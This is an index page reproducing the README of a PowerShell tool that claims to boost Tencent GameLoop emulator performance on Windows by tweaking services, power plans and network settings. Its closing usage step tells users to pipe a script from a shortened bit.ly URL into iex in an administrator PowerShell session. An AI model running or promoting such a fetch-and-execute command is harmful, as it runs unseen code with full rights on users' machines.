An open API service indexing awesome lists of open source software.

https://github.com/crtypubg/crty-gameloop-optimizer

CRTY GameLoop Optimizer is a free and easy-to-use tool that optimizes Tencent GameLoop emulator performance on Windows. It offers FPS boosting, anti-lag, input lag reduction, and efficient system resource management. Optimize your system with one click and enjoy smoother gameplay.
https://github.com/crtypubg/crty-gameloop-optimizer

boost fps game-booster gameloop gaming optimizer performance powershell system-optimization tweaks windows windows-10 windows-11

Last synced: 8 months ago
JSON representation

CRTY GameLoop Optimizer is a free and easy-to-use tool that optimizes Tencent GameLoop emulator performance on Windows. It offers FPS boosting, anti-lag, input lag reduction, and efficient system resource management. Optimize your system with one click and enjoy smoother gameplay.

Awesome Lists containing this project

README

          

# CRTY GameLoop Optimizer

**CRTY GameLoop Optimizer** is an easy-to-use PowerShell-based optimization tool designed to boost FPS and improve performance for Tencent GameLoop on Windows.

---

![CRTY GameLoop Optimizer Screenshot](https://raw.githubusercontent.com/CRTYPUBG/CRTY-GameLoop-Optimizer/refs/heads/main/screenshot.png)

---

## Features

- Sets CPU power plan to High Performance mode.
- Disables Superfetch (SysMain) service to reduce unnecessary background processes.
- Disables unnecessary system services.
- Increases GameLoop process priority for smoother gameplay.
- Disables TCP autotuning to help reduce network lag.
- Allows easy rollback of applied optimizations.

---

## Usage

1. Open PowerShell **as Administrator**.
2. Download or copy the `CRTY_GameLoop_Optimizer.ps1` script file.
3. Run the script:
```powershell
.\CRTY_GameLoop_Optimizer.ps1
## How to Use

You can use the **CRTY GameLoop Optimizer** in two ways:

### 1. Run Instantly Without Downloading

Open **PowerShell as Administrator** and run this command to download and run the latest version instantly:

```powershell
iwr -useb https://bit.ly/crty_web_gameloop | iex